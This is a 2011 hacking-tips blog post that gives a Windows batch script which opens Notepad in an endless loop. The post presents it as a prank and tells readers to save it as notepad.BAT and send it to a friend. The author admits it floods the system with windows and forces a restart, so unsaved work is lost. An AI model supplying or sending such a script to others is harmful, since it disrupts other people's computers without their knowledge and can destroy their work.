Saturday, 16 April 2011

Notepad Trick to Open notepad continuously

Posted by Ankit at 03:00


This simple computer prank consists of a code below that will drive your friend crazy as it opens notepad continuously.
When you type the below code and rename it as *.bat it take the above showed icon shape.
To Open Notepad continuously in your friend’s computer:
Type the code in notepad as :


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “notepad.BAT” and send it.
Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file



If you enjoyed this post and wish to be informed whenever a new post is published, then make sure you subscribe to my regular Email Updates. Subscribe Now!


Kindly Bookmark and Share it:

YOUR ADSENSE CODE GOES HERE

0 comments:

Have any question? Feel Free To Post Below:

Blog Archive

 

Popular Posts

Recent Comments

© 2011. All Rights Reserved | Krackhack | Template by Blogger Widgets

Home | About | Top